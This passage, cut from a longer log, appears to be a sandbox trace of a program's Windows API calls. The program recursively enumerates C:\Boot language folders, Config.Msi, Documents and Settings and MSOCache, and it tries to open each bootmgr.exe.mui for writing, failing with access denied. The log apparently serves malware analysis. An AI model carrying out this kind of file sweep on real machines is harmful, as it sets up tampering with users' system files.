lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.925] GetProcessHeap () returned 0x550000 [0129.925] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.925] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.925] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.925] GetProcessHeap () returned 0x550000 [0129.925] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.925] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.963] GetLastError () returned 0x5 [0129.963] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.963] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.963] GetProcessHeap () returned 0x550000 [0129.963] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.963] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0129.963] GetProcessHeap () returned 0x550000 [0129.963] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.963] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.964] GetProcessHeap () returned 0x550000 [0129.964] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.964] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.964] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.964] GetProcessHeap () returned 0x550000 [0129.964] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.964] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.964] GetLastError () returned 0x5 [0129.964] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.964] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.964] GetProcessHeap () returned 0x550000 [0129.964] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.964] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0129.964] GetProcessHeap () returned 0x550000 [0129.964] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.964] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.965] GetProcessHeap () returned 0x550000 [0129.965] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.965] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.965] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.965] GetProcessHeap () returned 0x550000 [0129.965] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.965] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.967] GetLastError () returned 0x5 [0129.967] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.967] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.967] GetProcessHeap () returned 0x550000 [0129.967] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.967] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0129.967] GetProcessHeap () returned 0x550000 [0129.967] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.967] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.967] GetProcessHeap () returned 0x550000 [0129.967] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.967] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.968] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.968] GetProcessHeap () returned 0x550000 [0129.968] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.968] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.968] GetLastError () returned 0x5 [0129.968] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.968] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.968] GetProcessHeap () returned 0x550000 [0129.968] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.968] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0129.968] GetProcessHeap () returned 0x550000 [0129.968] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.968] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.969] GetProcessHeap () returned 0x550000 [0129.969] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.969] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.969] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.969] GetProcessHeap () returned 0x550000 [0129.969] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.969] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.969] GetLastError () returned 0x5 [0129.969] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.969] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.969] GetProcessHeap () returned 0x550000 [0129.969] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.969] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0129.969] FindClose (in: hFindFile=0x56c9b0 | out: hFindFile=0x56c9b0) returned 1 [0129.969] GetProcessHeap () returned 0x550000 [0129.969] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x591d38 | out: hHeap=0x550000) returned 1 [0129.970] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0xffff, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0129.970] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0xffff, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0129.970] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0129.970] GetProcessHeap () returned 0x550000 [0129.970] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.970] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.970] GetProcessHeap () returned 0x550000 [0129.970] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.970] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0129.970] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 0 [0129.970] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.970] GetProcessHeap () returned 0x550000 [0129.970] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x550000) returned 1 [0129.971] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xffff, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0129.971] GetProcessHeap () returned 0x550000 [0129.971] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x44) returned 0x598fa0 [0129.971] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 0xffffffff [0129.971] GetProcessHeap () returned 0x550000 [0129.971] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x598fa0 | out: hHeap=0x550000) returned 1 [0129.971] GetLastError () returned 0x5 [0129.971] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0xffff, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0129.971] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xffff, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0129.971] GetProcessHeap () returned 0x550000 [0129.971] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x28) returned 0x56e6b0 [0129.971] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*", lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.972] GetProcessHeap () returned 0x550000 [0129.972] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56e6b0 | out: hHeap=0x550000) returned 1 [0129.972] FindNextFileW (in: 